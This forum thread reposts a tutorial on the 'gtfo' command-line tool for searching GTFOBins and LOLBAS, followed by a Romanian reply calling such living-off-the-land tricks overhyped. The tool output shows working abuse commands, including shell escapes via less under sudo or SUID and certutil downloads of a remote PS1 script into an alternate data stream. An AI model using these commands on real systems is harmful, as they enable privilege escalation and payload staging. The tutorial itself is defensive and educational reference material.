Kev Posted October 11, 2020 Report Posted October 11, 2020 GTFOBins and LOLBAS are projects with the goal of documenting native binaries that can be abused and exploited by attackers on Unix and Windows systems, respectfully. These binaries are often used for "living off the land" techniques during post-exploitation. In this tutorial, we will be exploring gtfo, a tool used to search these projects for abusable binaries right from the command line. What Is Living Off the Land? Living off the land is a method used by attackers that utilizes existing tools and features in the target environment to further the attack. Goals can include privilege escalation, lateral movement, persistence, data exfiltration, spawning reverse shells, and more. This technique is great at flying under the radar and can be difficult for defenders to detect. Since many of these tools are used for legitimate administration, it can be hard to separate malicious activity from normal activity. Windows PowerShell is a good example. Despite being abused by attackers for years, it is still a common vector during post-exploitation. Another compelling reason that malicious actors prefer to use native binaries is cost. In general, it is much more expensive and risky to develop custom tools that are more likely to be flagged to begin with. Especially when living off the land techniques can become wormable, it's in an attacker's best interest to use what is already there. GTFOBins and LOLBAS are no doubt excellent resources when it comes to abusing native binaries, but sometimes it can be tedious to switch back and forth from the browser. Gtfo is a tool written in Python that aims to provide all the information these resources have to offer from the terminal's convenience. Installing Gtfo To install gtfo, the first thing we need to do is clone the GitHub repository: ~# git clone https://github.com/mzfr/gtfo Cloning into 'gtfo'... remote: Enumerating objects: 56, done. remote: Counting objects: 100% (56/56), done. remote: Compressing objects: 100% (42/42), done. remote: Total 56 (delta 21), reused 42 (delta 12), pack-reused 0 Unpacking objects: 100% (56/56), 317.52 KiB | 1.65 MiB/s, done. Next, change into the newly created directory: ~# cd gtfo Gtfo uses Python 3, so we need to use pip3 here. It can be installed with the following command: ~/gtfo# apt install python3-pip Now we can install the required dependencies: ~/gtfo# pip3 install -r requirements.txt Requirement already satisfied: pyyaml in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (5.3.1) Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (2.23.0) Collecting bs4 Downloading bs4-0.0.1.tar.gz (1.1 kB) Requirement already satisfied: lxml in /usr/lib/python3/dist-packages (from -r requirements.txt (line 4)) (4.5.2) Collecting requests_cache Downloading requests_cache-0.5.2-py2.py3-none-any.whl (22 kB) Requirement already satisfied: tabulate in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (0.8.2) Requirement already satisfied: pyfiglet in /usr/lib/python3/dist-packages (from -r requirements.txt (line 7)) (0.8.post0) Requirement already satisfied: beautifulsoup4 in /usr/lib/python3/dist-packages (from bs4->-r requirements.txt (line 3)) (4.9.1) Building wheels for collected packages: bs4 Building wheel for bs4 (setup.py) ... done Created wheel for bs4: filename=bs4-0.0.1-py3-none-any.whl size=1272 sha256=2a0036256cc5bc7b34622abe1b56ff080f2829a0ae7cc2c858b079e0c9172e71 Stored in directory: /root/.cache/pip/wheels/75/78/21/68b124549c9bdc94f822c02fb9aa3578a669843f9767776bca Successfully built bs4 Installing collected packages: bs4, requests-cache Successfully installed bs4-0.0.1 requests-cache-0.5.2 Now we can run gtfo with the dot-slash command: ~/gtfo# ./gtfo _ _ _ __ _| || |_ | | / _| |_ __ _| __ _| |_| |_ ___ _| || |_ / _` | __| _/ _ \ |_ __ _| | (_| | |_| || (_) | |_||_| \__, |\__|_| \___/ __/ | |___/ usage: gtfo [-h] (-b BINS | -e EXE | -w LINK | -ls {bins,exe}) gtfo: error: one of the arguments -b/--bins -e/--exe -w/--link -ls/--list is required This gives us some short usage information. We should be able to run this tool from anywhere on our system by creating a symbolic link to the executable. Navigate to /usr/local/bin to get started: ~/gtfo# cd /usr/local/bin/ And create a symbolic link called gtfo to the executable in the directory we cloned from GitHub earlier: ~/usr/local/bin# ln -s ~/NB/gtfo/gtfo gtfo Now we can run gtfo from any directory. Using Gtfo to Search Binaries To view the help menu and optional arguments, use the -h flag: ~# gtfo -h _ _ _ __ _| || |_ | | / _| |_ __ _| __ _| |_| |_ ___ _| || |_ / _` | __| _/ _ \ |_ __ _| | (_| | |_| || (_) | |_||_| \__, |\__|_| \___/ __/ | |___/ usage: gtfo [-h] (-b BINS | -e EXE | -w LINK | -ls {bins,exe}) optional arguments: -h, --help show this help message and exit -b BINS, --bins BINS Search binaries on GTFOBins -e EXE, --exe EXE Search Windows exe on LOLBAS -w LINK, --link LINK gtfobins link to the page -ls {bins,exe}, --list {bins,exe} list all the available binaries We can list the Unix binaries with the -ls switch followed by the bins argument: ~# gtfo -ls bins _ _ _ __ _| || |_ | | / _| |_ __ _| __ _| |_| |_ ___ _| || |_ / _` | __| _/ _ \ |_ __ _| | (_| | |_| || (_) | |_||_| \__, |\__|_| \___/ __/ | |___/ ╒═════════════╤═══════════╤═══════════╤════════════╤═══════════╤══════════════╤═════════════╤══════════╤═══════════════════╤══════════╕ │ apt-get │ apt │ aria2c │ arp │ ash │ awk │ base32 │ base64 │ bash │ bpftrace │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ bundler │ busctl │ busybox │ byebug │ cancel │ cat │ chmod │ chown │ chroot │ cobc │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ cp │ cpan │ cpulimit │ crash │ crontab │ csh │ curl │ cut │ dash │ date │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ dd │ dialog │ diff │ dmesg │ dmsetup │ dnf │ docker │ dpkg │ easy_install │ eb │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ ed │ emacs │ env │ eqn │ expand │ expect │ facter │ file │ find │ finger │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ flock │ fmt │ fold │ ftp │ gawk │ gcc │ gdb │ gem │ genisoimage │ gimp │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ git │ grep │ gtester │ hd │ head │ hexdump │ highlight │ iconv │ iftop │ ionice │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ ip │ irb │ jjs │ journalctl │ jq │ jrunscript │ ksh │ ksshell │ ld.so │ ldconfig │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ less │ logsave │ look │ ltrace │ lua │ lwp-download │ lwp-request │ mail │ make │ man │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ mawk │ more │ mount │ mtr │ mv │ mysql │ nano │ nawk │ nc │ nice │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ nl │ nmap │ node │ nohup │ nroff │ nsenter │ od │ openssl │ pdb │ perl │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ pg │ php │ pic │ pico │ pip │ pkexec │ pry │ puppet │ python │ rake │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ readelf │ red │ redcarpet │ restic │ rlogin │ rlwrap │ rpm │ rpmquery │ rsync │ ruby │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ run-mailcap │ run-parts │ rview │ rvim │ scp │ screen │ script │ sed │ service │ setarch │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ sftp │ shuf │ smbclient │ socat │ soelim │ sort │ sqlite3 │ ssh │ start-stop-daemon │ stdbuf │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ strace │ strings │ su │ sysctl │ systemctl │ tac │ tail │ tar │ taskset │ tclsh │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ tcpdump │ tee │ telnet │ tftp │ time │ timeout │ tmux │ top │ ul │ unexpand │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ uniq │ unshare │ uudecode │ uuencode │ valgrind │ vi │ view │ vim │ watch │ wget │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ whois │ wish │ xargs │ xxd │ xz │ yelp │ yum │ zip │ zsh │ zsoelim │ ├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤ │ zypper │ │ │ │ │ │ │ │ │ │ ╘═════════════╧═══════════╧═══════════╧════════════╧═══════════╧══════════════╧═════════════╧══════════╧═══════════════════╧══════════╛ This outputs a nice table containing all the abusable binaries that can be found on GTFOBins. To list Windows binaries, use the -ls switch followed by the exe argument: ~# gtfo -ls exe _ _ _ __ _| || |_ | | / _| |_ __ _| __ _| |_| |_ ___ _| || |_ / _` | __| _/ _ \ |_ __ _| | (_| | |_| || (_) | |_||_| \__, |\__|_| \___/ __/ | |___/ ╒═══════════════════╤══════════════════════╤═════════════════════════════════╤══════════════════════════════╤═══════════════════════╤════════════════════════╤══════════════════════════════╕ │ At.exe │ Atbroker.exe │ Bash.exe │ Bitsadmin.exe │ CertReq.exe │ Certutil.exe │ Cmd.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Cmdkey.exe │ Cmstp.exe │ Control.exe │ Csc.exe │ Cscript.exe │ Desktopimgdownldr.exe │ Dfsvc.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Diantz.exe │ Diskshadow.exe │ Dnscmd.exe │ Esentutl.exe │ Eventvwr.exe │ Expand.exe │ │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Extexport.exe │ Extrac32.exe │ Findstr.exe │ Forfiles.exe │ Ftp.exe │ GfxDownloadWrapper.exe │ Gpscript.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Hh.exe │ Ie4uinit.exe │ Ieexec.exe │ Ilasm.exe │ Infdefaultinstall.exe │ Installutil.exe │ Jsc.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Makecab.exe │ Mavinject.exe │ Microsoft.Workflow.Compiler.exe │ Mmc.exe │ MpCmdRun.exe │ Msbuild.exe │ Msconfig.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Msdt.exe │ Mshta.exe │ Msiexec.exe │ Netsh.exe │ Odbcconf.exe │ Pcalua.exe │ Pcwrun.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Pktmon.exe │ Presentationhost.exe │ Print.exe │ Psr.exe │ Rasautou.exe │ Reg.exe │ Regasm.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Regedit.exe │ Regini.exe │ Register-cimprovider.exe │ Regsvcs.exe │ Regsvr32.exe │ Replace.exe │ Rpcping.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Rundll32.exe │ Runonce.exe │ Runscripthelper.exe │ Sc.exe │ Schtasks.exe │ Scriptrunner.exe │ SyncAppvPublishingServer.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Ttdinject.exe │ Tttracer.exe │ vbc.exe │ Verclsid.exe │ Wab.exe │ Wmic.exe │ Wscript.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Wsreset.exe │ Xwizard.exe │ Advpack.dll │ Comsvcs.dll │ Ieadvpack.dll │ Ieaframe.dll │ Mshtml.dll │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Pcwutl.dll │ Setupapi.dll │ Shdocvw.dll │ Shell32.dll │ Syssetup.dll │ Url.dll │ Zipfldr.dll │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ AgentExecutor.exe │ Appvlp.exe │ Bginfo.exe │ Cdb.exe │ csi.exe │ Devtoolslauncher.exe │ dnx.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Dotnet.exe │ Dxcap.exe │ Excel.exe │ Mftrace.exe │ Msdeploy.exe │ msxsl.exe │ ntdsutil.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Powerpnt.exe │ rcsi.exe │ Sqldumper.exe │ Sqlps.exe │ SQLToolsPS.exe │ Squirrel.exe │ te.exe │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Tracker.exe │ Update.exe │ vsjitdebugger.exe │ Winword.exe │ Wsl.exe │ CL_Mutexverifiers.ps1 │ CL_Invocation.ps1 │ ├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤ │ Manage-bde.wsf │ Pubprn.vbs │ Slmgr.vbs │ Syncappvpublishingserver.vbs │ winrm.vbs │ Pester.bat │ │ ╘═══════════════════╧══════════════════════╧═════════════════════════════════╧══════════════════════════════╧═══════════════════════╧════════════════════════╧══════════ This outputs a table containing all the abusable binaries that can be found on LOLBAS. To get information about a specific binary, use the -b flag. Here we can see information about the Unix less command: ~# gtfo -b less _ _ _ __ _| || |_ | | / _| |_ __ _| __ _| |_| |_ ___ _| || |_ / _` | __| _/ _ \ |_ __ _| | (_| | |_| || (_) | |_||_| \__, |\__|_| \___/ __/ | |___/ Code: less /etc/profile !/bin/sh Type: shell Code: VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile v Type: shell Code: less file_to_read Type: file-read # This is useful when `less` is used as a pager by another binary to read a different file. Code: less /etc/profile :e file_to_read Type: file-read Code: echo DATA | less sfile_to_write q Type: file-write # This invokes the default editor to edit the file. The file must exist. Code: less file_to_write v Type: file-write Code: sudo less /etc/profile !/bin/sh Type: sudo Code: ./less file_to_read Type: suid In the output, we can see the type of abuse and the corresponding code. This example contains code for sudo and SUID, to get a shell, and to read and write files. We can also get the link to the GTFOBins page with the -w option: ~# gtfo -w less _ _ _ __ _| || |_ | | / _| |_ __ _| __ _| |_| |_ ___ _| || |_ / _` | __| _/ _ \ |_ __ _| | (_| | |_| || (_) | |_||_| \__, |\__|_| \___/ __/ | |___/ --> less --------------------> https://gtfobins.github.io//gtfobins/less To view information on a particular Windows binary, use the -e flag. Please note this is case sensitive and the extension is required. Here, we can see information about the Certutil.exe program: ~# gtfo -e Certutil.exe _ _ _ __ _| || |_ | | / _| |_ __ _| __ _| |_| |_ ___ _| || |_ / _` | __| _/ _ \ |_ __ _| | (_| | |_| || (_) | |_||_| \__, |\__|_| \___/ __/ | |___/ # Download and save 7zip to disk in the current folder. CMD: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe Category: Download Privileges: User # Download and save 7zip to disk in the current folder. CMD: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe Category: Download Privileges: User # Download and save a PS1 file to an Alternate Data Stream (ADS). CMD: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt Category: ADS Privileges: User # Command to encode a file using Base64 CMD: certutil -encode inputFileName encodedOutputFileName Category: Encode Privileges: User # Command to decode a Base64 encoded file. CMD: certutil -decode encodedInputFileName decodedOutputFileName Category: Decode Privileges: User We can see the category, command, and required privileges in the output. This example contains commands to encrypt, decrypt, and download files. We can also get the link to the LOLBAS page with the -w option: ~# gtfo -w Certutil.exe _ _ _ __ _| || |_ | | / _| |_ __ _| __ _| |_| |_ ___ _| || |_ / _` | __| _/ _ \ |_ __ _| | (_| | |_| || (_) | |_||_| \__, |\__|_| \___/ __/ | |___/ --> Certutil.exe --------------------> https://lolbas-project.github.io//lolbas/Binaries/Certutil Wrapping Up This tutorial taught us about the GTFOBins and LOLBAS projects and how incredibly useful they can be for information on native binaries on Unix and Windows systems. We also explored gtfo, a tool that can search these resources right from the command line. As you can see, gtfo can be quite useful for searching abusable binaries without ever having to leave the terminal. Source 1 Quote
Nytro Posted October 11, 2020 Report Posted October 11, 2020 Oare sunt singurul pentru care toate astea sunt miste mizerii inutile? Cu extrem de mici exceptii ar putea fi foarte putin utile. In rest, nu vad nicio valoare in asa ceva si nu inteleg de ce se agita lumea cand vine vorba de asta. PS: Am intrebat de curiozitate o persoana cu experienta referitoare la utilitatea acestor "chestii", persoana care cumva le "promova" si nu m-a convins absolut deloc ca ar avea vreun avantaj. PS: Stiu ca toata lumea zice ca astfel poti face bypass la AV sau EDR. Daca exista vreun AV sau EDR atat de retardat incat sa folosesti certutil sa descarci un binar detectabil si sa il executi iar el sa nu se prinda doar pentru ca este rulat de catre certutil, porcariile alea nu sunt AV sau EDR, trebuie dezinstalate instant si trimis mail cu injuraturi autohtone catre gunoierii care le-au facut. Quote
